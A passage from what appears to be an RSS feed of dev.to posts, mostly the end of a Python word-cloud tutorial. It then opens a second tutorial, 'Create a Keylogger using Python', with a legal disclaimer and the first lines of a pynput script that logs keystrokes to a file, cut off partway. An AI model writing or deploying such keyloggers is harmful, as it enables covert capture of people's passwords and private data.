class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;my&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;of&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;or&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;on&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;said&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;that&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;the&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;there&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;this&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;to&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;with&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;Counter&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;word&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;word&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;split&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;word&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;stopwords&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;clean_file()&lt;/code&gt; function takes 1 parameter &lt;code&gt;data&lt;/code&gt; which is the text file that will be passed to it. The &lt;code&gt;re&lt;/code&gt; module is used to remove punctuation marks from the text. Additionally, any &lt;code&gt;stopwords&lt;/code&gt; (i.e. commonly used words) will be removed as well. The results are returned in a &lt;code&gt;Counter&lt;/code&gt; object which is used to count the frequency of the remaining words in the file.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Generate Wordcloud
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;WordCloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;height&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;800&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;width&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1200&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;generate_from_frequencies&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;generate_wordcloud()&lt;/code&gt; function takes 1 parameter, &lt;code&gt;data&lt;/code&gt;, which is the &lt;code&gt;Counter&lt;/code&gt; object.  It uses this word frequency hashmap to  generate a &lt;code&gt;Wordcloud&lt;/code&gt; image &lt;code&gt;800x1200&lt;/code&gt; pixels in size. The result is the following Wordcloud image:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjbbiqvmke6fhxtm40ofg.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjbbiqvmke6fhxtm40ofg.jpg" alt="The Raven Word Cloud"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: Save Wordcloud
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;save_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;to_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; has been successfully saved.&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally we want to save this Wordcloud image. The &lt;code&gt;save_wordcloud()&lt;/code&gt; function takes two parameters, &lt;code&gt;data&lt;/code&gt; and &lt;code&gt;filename&lt;/code&gt;. &lt;code&gt;data&lt;/code&gt; is the wordcloud object that will be saved, and &lt;code&gt;filename&lt;/code&gt; is that name the file will be saved as. &lt;/p&gt;

&lt;h2&gt;
  
  
  Implementing the Code
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# Get the path of the text file
&lt;/span&gt;    &lt;span class="n"&gt;raven_path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;the_raven.txt&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Open this text file:
&lt;/span&gt;    &lt;span class="n"&gt;raven_file&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raven_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Clean the text file:
&lt;/span&gt;    &lt;span class="n"&gt;process_file&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raven_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Generate wordcloud
&lt;/span&gt;    &lt;span class="n"&gt;raven_cloud&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Wordcloud&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;generate_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;process_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Save wordcloud image as 'raven_cloud.jpg'
&lt;/span&gt;    &lt;span class="nf"&gt;save_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raven_cloud&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;raven_cloud.jpg&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The Full Code
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;re&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;collections&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Counter&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;wordcloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;WordCloud&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;encoding&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;utf-8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;fo&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;content&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;lower&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;fo&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;clean_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;re&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sub&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;r&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;[^\w\s]&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;stopwords&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;a&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;an&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;and&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;as&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;at&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;but&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;by&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;from&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;he&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;him&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;i&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;is&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;my&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;of&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;or&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;on&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;said&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;that&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;the&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;there&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;this&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;to&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;with&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;Counter&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;word&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;word&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;split&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; 
                    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;word&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;stopwords&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;WordCloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;height&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;800&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;width&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1200&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;generate_from_frequencies&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;save_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;to_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; has been successfully saved.&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;raven_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;the_raven.txt&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;raven_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raven_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;process_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raven_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;raven_cloud&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;generate_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;process_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;save_wordcloud&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raven_cloud&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;raven_cloud.jpg&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;After reading this tutorial you should now be able to generate your own Wordcloud using Python. Use your imagination and have fun! Checkout the &lt;a href="https://amueller.github.io/word_cloud/" rel="noopener noreferrer"&gt;WordCloud for Python Documentation&lt;/a&gt; to learn more what you can do with this Python library.  Please leave &lt;code&gt;like&lt;/code&gt; or &lt;code&gt;comment&lt;/code&gt; if you found this article interesting!&lt;/p&gt;




&lt;ul&gt;
&lt;li&gt;Code available at &lt;a href="https://github.com/seraph776/DevCommunity/tree/main/WordCloud" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>Create a Keylogger using Python</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Sun, 24 Jul 2022 22:43:00 +0000</pubDate>
      <link>https://dev.to/seraph776/create-a-keylogger-using-python-22kg</link>
      <guid>https://dev.to/seraph776/create-a-keylogger-using-python-22kg</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;In this tutorial, you will learn how to write a keylogger in Python. A keylogger is a type of surveillance tool used to monitor and record each keystroke typed on a specific computer's keyboard.&lt;/p&gt;

&lt;h3&gt;
  
  
  ⚠️ LEGAL DISCLAIMER
&lt;/h3&gt;

&lt;p&gt;When it comes to the legality of &lt;a href="https://www.ncsl.org/research/telecommunications-and-information-technology/computer-hacking-and-unauthorized-access-laws.aspx" rel="noopener noreferrer"&gt;Keyloggers and other hacking tools, are legal to possess&lt;/a&gt;. However, installing it on a computer, even your personal computer, can expose you to legal trouble. If you let anyone else use your computer without disabling the keylogger, or not inform them that it is active, you are likely violating federal law. The goal of this tutorial is for security awareness and educational purposes. &lt;/p&gt;

&lt;h2&gt;
  
  
  Implementing the Keylogger
&lt;/h2&gt;

&lt;p&gt;This is the full Keylogger.py script.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;

&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;pynput.keyboard&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Listener&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;logging&lt;/span&gt;


&lt;span class="n"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;basicConfig&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;keystroke_log.txt&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DEBUG&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="n"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
